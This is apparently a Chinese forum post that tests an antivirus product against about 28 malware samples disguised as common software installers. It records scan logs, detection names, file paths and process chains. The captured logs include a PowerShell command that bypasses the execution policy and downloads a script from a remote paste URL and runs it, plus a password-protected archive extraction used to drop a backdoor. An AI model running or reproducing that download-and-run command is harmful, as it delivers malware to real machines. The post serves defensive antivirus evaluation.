本帖最后由 UNknownOoo 于 2024-8-17 09:54 编辑
火绒
扫描:12x(实际处理后剩余18x
- 病毒库时间:2024-08-16 19:27
- 开始时间:2024-08-17 08:54
- 总计用时:00:00:36
- 扫描对象:8686
- 扫描文件:28
- 发现风险:12
- 已处理风险:12
- 病毒详情:
- 风险路径:C:\Users\Administrator\Desktop\28X\DibLookEx4.exe, 病毒名:TrojanDownloader/Lotok.bz, 病毒ID:e0890e16b3f91661, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\GooGle最新版8.10.exe, 病毒名:HackTool/DetectDee.a, 病毒ID:9bdbd47d15e8dceb, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\goind.exe, 病毒名:Trojan/FakeApp.z, 病毒ID:cd77a12bbf9d6cfb, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\Kuai-18.exe, 病毒名:Trojan/BAT.Starter.ce, 病毒ID:e8f565ceb7fab691, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\Kuai[过滤]-t.exe, 病毒名:Trojan/BAT.Starter.ce, 病毒ID:e8f565ceb7fab691, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\kuailian.msi, 病毒名:Trojan/HTML.Agent.an, 病毒ID:902eeb2873695a08, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\kuailian.msi, 病毒名:Trojan/BAT.Runner.p, 病毒ID:efba62601c3b765d, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\UCK (2).exe, 病毒名:Trojan/Injector.bhp, 病毒ID:8907d00f9644703e, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\s-2024.msi, 病毒名:Trojan/HTML.Agent.an, 病毒ID:902eeb2873695a08, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\UCK.exe, 病毒名:Trojan/Injector.bsm, 病毒ID:eae78288c80f8c04, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\s-2024.msi, 病毒名:Trojan/BAT.Runner.p, 病毒ID:efba62601c3b765d, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Administrator\Desktop\28X\WPS Office 2.01.4.13.exe, 病毒名:HEUR:Backdoor/Lotok.bb, 病毒ID:d46826b55974cb62, 处理结果:已处理,删除文件
复制代码
剩下运行:
aicoin-latestx64.exe -> 内存防护捉(误报?)
- 病毒名称:Ransom/Filecoder.cd
- 病毒ID:AE57D84F78B7ABE5
- 虚拟地址:0x0000000003E90000
- 映像大小:4.1MB
- 是否完整映像:是
- 数据流哈希:a17d0894
- 操作结果:已处理
- 进程ID:1188
- 操作进程:C:\AICoin2.10.10.2 VtVzy2c1Q\aicoin\WdsUnattend.exe
- 操作进程命令行:"C:\AICoin2.10.10.2 VtVzy2c1Q\aicoin\WdsUnattend.exe" hHe
- 父进程ID:8964
- 父进程:C:\Users\Administrator\AppData\Local\Temp\is-4V5M2.tmp\aicoin-latestx64.tmp
- 父进程命令行:"C:\Users\ADMINI~1\AppData\Local\Temp\is-4V5M2.tmp\aicoin-latestx64.tmp" /SL5="$6054E,113300987,737280,C:\Users\Administrator\Desktop\28X\aicoin-latestx64.exe"
复制代码
goog-64.exe -> 实时监控捉衍生物
- 病毒名称:Backdoor/Lotok.fo
- 病毒ID:9329ED8113F6EBE6
- 病毒路径:C:\ProgramData\tmp\Pro_DLL.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
- 进程ID:9148
- 操作进程:C:\ProgramData\7z.exe
- 操作进程命令行:7z.exe x "C:\ProgramData\~22,1~3,1~13,1~0,1~16,1~18,1.zip" -o"C:\ProgramData" -p112233 -y
- 父进程ID:7708
- 父进程:C:\Windows\SysWOW64\cmd.exe
复制代码
Google Chrome X64.msi -> 实时监控捉
- 病毒名称:TrojanDownloader/Agent.bbd
- 病毒ID:0DE715D87EEB3580
- 病毒路径:C:\Program Files (x86)\Googlr Setup\Googlr Setup\qucc.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
复制代码
Google Chrome-Setup.msi -> 同上
i4ails-5923.exe -> 手动内存扫描捉
- 病毒详情:
- 风险路径:mem://4424-0x34922a43-0x1a067520000-C:\Users\Administrator\AppData\Local\Programs\aitools\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码
Install_x64.exe -> 实时监控捉衍生物,主防&内存防护响应,随后AMSI捉powershell
- 病毒名称:HEUR:Trojan/Injector.av
- 病毒ID:3749376D7935E9B5
- 病毒路径:C:\Program Files\launcher289\1.exe
- 操作类型:修改
- 操作结果:已处理,删除文件
- 进程ID:6492
- 操作进程:C:\Users\Administrator\Desktop\Install_x64.exe
- 操作进程命令行:"C:\Users\Administrator\Desktop\Install_x64.exe"
- 父进程ID:5716
- 父进程:C:\Windows\explorer.exe
复制代码- 病毒名称:ADV:Trojan/GenInjector.I
- 病毒路径:C:\Program Files\launcher289\2.exe
- 操作结果:已处理
复制代码- 病毒名称:Backdoor/Meterpreter.bd
- 病毒ID:428362F194D7F51D
- 虚拟地址:0x0000000002600000
- 映像大小:2.3MB
- 是否完整映像:否
- 数据流哈希:19f63c63
- 操作结果:已处理
- 进程ID:2500
- 操作进程:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- 操作进程命令行:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- 父进程ID:11032
- 父进程:C:\Program Files\launcher289\2.exe
- 父进程命令行:"C:\Program Files\launcher289\2.exe"
复制代码- 病毒名称:TrojanDropper/PS.Maloader.az
- 病毒ID:42CBF69FF1C92AD9
- 病毒路径:PowerShell_FE83F4F004D1586158FFC54A9084E637A00AB5CA
- 操作类型:执行
- 操作结果:已处理,清除恶意代码
- 进程ID:580
- 操作进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- 操作进程命令行:powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
- 父进程ID:4960
- 父进程:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
复制代码
kg-20541.exe -> 手动内存扫描捉
- 病毒详情:
- 风险路径:mem://10344-0x8609808b-0x1c2c4820000-C:\Users\Administrator\AppData\Local\Programs\酷狗音乐\app\agentHtml\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码
Letss[过滤].exe -> 手动内存扫描捉
- 病毒详情:
- 风险路径:mem://6260-0x54125960-0x1ae9fe50000-C:\Users\Administrator\AppData\Local\Programs\Let[过滤]\expwebax.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码
Mari.exe -> 内存防护捉
- 病毒名称:Backdoor/Agent.pl
- 病毒ID:37CFF1CC6F5EBF8A
- 虚拟地址:0x0000000003330000
- 映像大小:420KB
- 是否完整映像:否
- 数据流哈希:70d25023
- 操作结果:已处理
- 进程ID:8852
- 操作进程:C:\Users\Public\Documents\r4H7U\F84ZU~i\uc_ctrl.exe
- 操作进程命令行:"C:\Users\Public\Documents\r4H7U\F84ZU~i\uc_ctrl.exe"
- 父进程ID:4952
- 父进程:C:\Windows\System32\mmc.exe
- 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码
P.exe -> 内存防护捉
- 病毒名称:Backdoor/Agent.pl
- 病毒ID:37CFF1CC6F5EBF8A
- 虚拟地址:0x00000000034F0000
- 映像大小:420KB
- 是否完整映像:否
- 数据流哈希:b809a6ca
- 操作结果:已处理
- 进程ID:11180
- 操作进程:C:\Users\Public\Documents\x40Zj\PN5Rw~z1\uc_ctrl.exe
- 操作进程命令行:"C:\Users\Public\Documents\x40Zj\PN5Rw~z1\uc_ctrl.exe"
- 父进程ID:5204
- 父进程:C:\Windows\System32\mmc.exe
- 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码
sgX64_278.exe -> 手动内存扫描捉
- 病毒详情:
- 风险路径:mem://7732-0xde5c7c9f-0x27da1770000-C:\Users\Administrator\AppData\Local\Programs\sogoipt\app\agentHtml\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码
sunlogin.exe -> 下载太慢放弃挣扎(
tradingviewx64.exe -> 内存防护捉
- 病毒名称:Ransom/Filecoder.cd
- 病毒ID:AE57D84F78B7ABE5
- 虚拟地址:0x00000000035C0000
- 映像大小:4.1MB
- 是否完整映像:是
- 数据流哈希:8c562ea0
- 操作结果:已处理
- 进程ID:9472
- 操作进程:C:\TradingView Desktop6.1.5.3 xKzd\appreascv\BdeH.exe
- 操作进程命令行:"C:\TradingView Desktop6.1.5.3 xKzd\appreascv\BdeH.exe"
- 父进程ID:5952
- 父进程:C:\Windows\explorer.exe
- 父进程命令行:C:\Windows\Explorer.EXE
复制代码
win32-quickq.exe -> 实时监控捉衍生物
- 病毒名称:Backdoor/Lotok.db
- 病毒ID:EF40633B1E27719B
- 病毒路径:C:\Program Files (x86)\u1.exe
- 操作类型:修改
- 操作结果:已处理,删除文件
复制代码
WPS Office_12.1.1.exe -> 实时监控捉衍生物
- 病毒名称:Trojan/HiJack.hb
- 病毒ID:1E80486F157A524E
- 病毒路径:C:\Program Files (x86)\WindowsInstallerRH\B3EFC20\WHelp.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
- 病毒名称:Trojan/HiJack.hb
- 病毒ID:1E80486F157A524E
- 病毒路径:C:\Users\Default\Desktop\SeILTPBQCKHG\WHelp.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
复制代码
X64-3981.exe -> 衍生物自退?
yi.exe -> 内存防护捉衍生物
- 病毒名称:Backdoor/Agent.pl
- 病毒ID:37CFF1CC6F5EBF8A
- 虚拟地址:0x0000000003640000
- 映像大小:420KB
- 是否完整映像:是
- 数据流哈希:eae0e4f0
- 操作结果:已处理
- 进程ID:3008
- 操作进程:C:\Users\Public\Pictures\01TvA\gZh76~z\QKWebGame.exe
- 操作进程命令行:"C:\Users\Public\Pictures\01TvA\gZh76~z\QKWebGame.exe"
- 父进程ID:4556
- 父进程:C:\Windows\System32\mmc.exe
- 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码
youdao-fanyi.exe -> MISS
|